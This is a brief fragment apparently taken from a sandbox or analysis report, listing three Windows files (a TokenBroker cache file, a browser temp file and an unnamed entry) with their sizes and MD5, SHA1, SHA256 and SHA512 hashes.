SHA5129b767b1bea52d645267b30448539643ad8c35f65b64f3eb3e011064054299428f824c864ac5d151088bb97e443b0ce59a3b22ee6d51d90b72b131b33bafcf853
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD5273d408e6c1992624d685068feeaa816
SHA176d92607d70b10fc592226dd9f19225dc3e0bf05
SHA25637f408b0d098e5dcd96bd81448673387b3c8d10c41025a209a8fc33a5399762e
SHA5123fd22046db9ee4179ce5336574f8ce0f793511a8244c76369ec760cc9e88fa67a790ae56e93d7521a011763735d849de9354ae109dfdd9bdbbba7b6bc625b23d
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir5552_1847889656\30aca304-435c-482a-bc11-f1402c2092f3.tmp
Filesize152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
288B
MD5222b60ec90fa50f61520dacef0eca8d2
SHA154733dbe0330504403d4d7f2718e7809c5653ad5
SHA2562cc69a4d3b0a160177004302f793130664ebdfcd4963c629a2dd85e84acb888a
SHA512cf4fa34d32ac5d0e000bc41c50c99a789b835bdfaac41e0dc277369608adc47b706b0dd6da6090ff50a530600ac2a2227b20961b5c5eba93779834c09ca8a457